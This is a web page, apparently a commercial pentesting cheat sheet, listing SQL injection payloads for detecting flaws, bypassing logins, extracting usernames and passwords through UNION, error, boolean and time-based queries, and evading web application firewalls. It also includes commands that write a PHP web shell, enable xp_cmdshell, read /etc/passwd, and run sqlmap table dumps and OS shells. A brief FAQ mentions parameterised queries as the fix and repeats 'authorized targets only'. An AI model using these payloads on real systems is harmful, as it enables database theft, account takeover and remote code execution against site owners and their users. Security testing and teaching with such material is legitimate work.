# Detection
First confirm the parameter is injectable. Break the query, then prove control with boolean logic.
'' OR '1'='1' AND '1'='21 OR 1=1 -- -1' ORDER BY 1-- - → ORDER BY 2, 3, ...-- - (space after!), # (MySQL), /* */ (inline). URL-encode # as %23.# Authentication Bypass
Classic login bypass — comment out the password check or force the WHERE clause true.
admin' -- -admin' #' OR 1=1 -- -' OR '1'='1' -- -') OR ('1'='1' -- -# UNION-Based Injection
Return your own data in the response. Match the column count, find reflected columns, then extract.
' UNION SELECT NULL-- - → NULL,NULL-- - → ...' UNION SELECT 1,2,3-- -' UNION SELECT NULL,version(),database()-- -' UNION SELECT table_name,NULL FROM information_schema.tables-- -' UNION SELECT column_name,NULL FROM information_schema.columns WHERE table_name='users'-- -' UNION SELECT username,password FROM users-- -' UNION SELECT NULL,group_concat(username,0x3a,password) FROM users-- -# Error-Based Injection
Leak data inside error messages when the app displays SQL errors.
' AND extractvalue(1,concat(0x7e,(SELECT database())))-- -' AND updatexml(1,concat(0x7e,(SELECT user())),1)-- -' AND 1=CONVERT(int,(SELECT @@version))-- -' AND 1=CAST((SELECT current_database()) AS int)-- -# Blind Boolean-Based
No output or errors — infer data from true/false differences in the response.
' AND 1=1-- - vs ' AND 1=2-- -' AND (SELECT SUBSTRING(version(),1,1))='8'-- -' AND (SELECT ASCII(SUBSTRING(username,1,1)) FROM users LIMIT 1)>77-- -' AND (SELECT COUNT(*) FROM users)>5-- -# Time-Based Blind
No visible difference at all — make the server pause when a condition is true.
' AND SLEEP(5)-- -' AND IF((SELECT ASCII(SUBSTRING(password,1,1)) FROM users LIMIT 1)>77,SLEEP(3),0)-- -'; WAITFOR DELAY '0:0:5'-- -' AND (SELECT pg_sleep(5))-- -' AND 1=(SELECT 1 FROM (SELECT SLEEP(5))x)-- -# Database-Specific Syntax
The essentials differ per DBMS. Fingerprint first, then use the right functions.
| Task | MySQL | MSSQL / PostgreSQL |
|---|---|---|
| Version | version() | @@version / version() |
| Current DB | database() | DB_NAME() / current_database() |
| Current user | user() | SYSTEM_USER / current_user |
| Concatenate | concat(a,b) / 0x3a | a+b / a||b |
| Comment | -- - or # | -- - or /* */ |
| Sleep | SLEEP(5) | WAITFOR DELAY / pg_sleep(5) |
SELECT schema_name FROM information_schema.schemataSELECT name FROM master..sysdatabases# RCE & File Access
Escalate from data theft to reading files or executing commands where the DB config allows it.
' UNION SELECT LOAD_FILE('/etc/passwd')-- -' UNION SELECT '<?php system($_GET[c]);?>' INTO OUTFILE '/var/www/html/s.php'-- -'; EXEC xp_cmdshell 'whoami'-- -'; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE-- -# WAF Bypass
When a WAF blocks obvious payloads, obfuscate. Highly context-dependent — try combinations.
'/**/OR/**/1=1-- -' oR 1=1-- - / ' UnIoN SeLeCt ...%2527 / %2b / double-URL-encodeUNIUNIONON SELSELECTECT' OR 1 LIKE 1-- - / ' OR 1 BETWEEN 0 AND 2-- -# sqlmap Automation
Automate detection and exploitation. Always run against authorized targets only.
sqlmap -u "http://site/page?id=1" --batchsqlmap -r request.txt --batchsqlmap -u URL --dbssqlmap -u URL -D shopdb --tablessqlmap -u URL -D shopdb -T users --dumpsqlmap -u URL --batch --level=5 --risk=3 --tamper=space2commentsqlmap -u URL --os-shell❓ SQL Injection FAQ
A web vulnerability where user input is concatenated into a SQL query without sanitisation, letting an attacker alter it — to bypass auth, read/modify data or sometimes run commands. It's part of the OWASP Top 10 Injection category.
Inject a single quote ' and watch for errors. Confirm with ' OR '1'='1 vs ' AND '1'='2 — differing responses mean it's injectable. For numeric params, try 1 OR 1=1 without quotes. Authorized testing only.
In-band: UNION-based and error-based. Blind: boolean-based and time-based. Out-of-band: exfil via DNS/HTTP. Pick based on the feedback the app gives.
Append UNION SELECT to return your own data in the output. Find the column count (ORDER BY n), spot reflected columns, then replace them with data like username/password/version().
When there's no output or error. Boolean-based reads true/false page differences; time-based uses SLEEP()/WAITFOR. Both extract data char by char — best automated with sqlmap.
sqlmap -u 'URL' --batch, or sqlmap -r request.txt for POST/auth. Then --dbs, -D db --tables, -D db -T users --dump. Authorized targets only.
Inline comments (/**/), case variation, URL/double-URL encoding, nested keywords, alternative operators. sqlmap tamper scripts (--tamper=space2comment) automate many. Very context-dependent.
Parameterised queries (prepared statements) are the top fix — input is never concatenated into SQL. Add least-privilege DB accounts, input allow-listing, an ORM and a WAF for defence in depth. Never rely on escaping alone.
📚 Related Resources
- Burp Suite Cheatsheet — Test and automate SQLi with Repeater and Intruder
- Reverse Shell Cheatsheet — Turn a SQLi web shell into a full reverse shell
- Full Pentesting Cheatsheet — 200+ commands for web, network, AD and privesc
- Pentesting Glossary — SQLi, XSS, WAF, payload and 60+ key terms defined
Turn your SQLi findings into a professional PDF report. AI auto-fills CVE, CVSS and severity.
Want all 12,020+ commands?
This SQL injection cheatsheet is one branch of the map. Pentest Mindmap organizes 12,020+ commands across 34 categories — recon to post-exploitation — with instant search and one-click copy.
Start free →